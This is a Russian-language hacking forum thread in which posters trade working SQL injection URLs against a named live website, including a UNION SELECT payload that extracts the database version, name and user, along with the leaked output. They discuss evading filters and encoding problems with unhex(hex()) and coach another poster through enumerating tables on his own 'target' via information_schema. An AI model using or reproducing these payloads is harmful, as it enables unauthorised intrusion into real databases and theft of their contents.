http://www.muslab.ru/msg.php?msg_id=-166884+UNION+SELECT+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),10,11,12,13,14,15/* Database Version: 4.1.11-Debian_4sarge2-log Database name: k4dre_data User name: [email protected] не понял в чем проблема?
Бля писец проблему нашли!!! version() здесь просто фильтруется!!! Вот вывод: http://www.muslab.ru/msg.php?msg_id=-166884+union+select+1,2,3,4,5,6,7,8,unhex(hex(version())),10,11,12,13,14,15
Не нужно писать чушь в перемешку с матом. О какой фильтрации ты говоришь? И что по твоему делает твой запрос? Обходит фильтрацию?
Jokester не злись, просто вот сюда http://forum.antichat.ru/thread104591.html всех надо посылать, благо много там познавательного
Причём тут чушь? На мой взгляд дело в несовмеситимости кодировок, что можно обойти как вариантом предложенным Gorev'ым так и моим... Может я чёт невдупляю, так ты поясни в чём моя ошибка... Начёт мата, не знал что бл* матом считать то можно)
DrAssault Кодировка и фильтрация , это абсолютно разные вещи. Сдесь кодировка, а фильтрация так не обходится, и обходиться не может. Мои пояснения (в том числе по этому вопросу) можно увидеть по линку приведённому Gorev'ым в посте выше
Я понимаю, что это разные вещи, глянул бегло, получил вывод, но в подробности не вдавался, во втором посте дыбнул осмысленно и исправился... Эт ясно что сдесь кодировка, но что ты имеешь ввиду под словами "фильтрация так не обходится, и обходиться не может"? А если фильтруется version() к примеру?
Под словами "фильтрация так не обходится, и обходиться не может" я подразумеваю фразу "фильтрация так не обходится, и обходиться не может", без всяких двусмысленностей и эвфемизмов . Тоесть данную фразу нужно воспринимать буквально, по написанию Если скрипт парсит GET , ну или любой массив , в котором ты передаёшь данные на предмет нахождения в нём строки "version", и завершает работу , при нахождении её (ну или режет\заменяет), то никакие унхексы, хексы и энкрипты ему не помешают это сделать.
jokester приношу извинения, тупанул чёто я, видимо не в себе был) понял, что смотрозил, сегодня даже для пущей уверенности протестил) ты прав...
Ни разу не встречал.что версион() фильтруется,но вот ( и ) сто раз уже встречал))),а как обходить не придумал ).
На HackZona.ru к примеру режется version() а как обходить ( и ) это уже зависит от конкретной ситуации...
перечитал очень много всего, не могу найти ответ, как обойти подстановку суффикса (abc.) к имени базы при попытке перебора. пробую: UNION+SELECT+1,db+from+mysql.db+LIMIT+1,1/* выводит: test пробую:UNION+SELECT+1,id+from+test+LIMIT+1,1/* выводит: [Table 'abc.test' doesn't exist] буду благодарен тем кто поможет добить таргет: пишите в асю.
2 LLIop0x: ))) Значение из колонки прежде чем выводить, имя таблицы узнай: UNION+SELECT+1,table_name+from+information_schema.tables/*
2 LLIop0x: если версия 4-я мускула, то только методом "тыка" подбирать таблички, если 5-я версия то способ который предлогал Pashkela
Какой суффикс, че к чему? Ошибка тебе говорит о следующем, что таблици test в бд abc нет просто напросто и никакой это не суфикс, сначала узнай таблицу, а уж потом текущую БД к ней, соответственно, если версия пятая, если же 4, то тут жоперский-перебор...
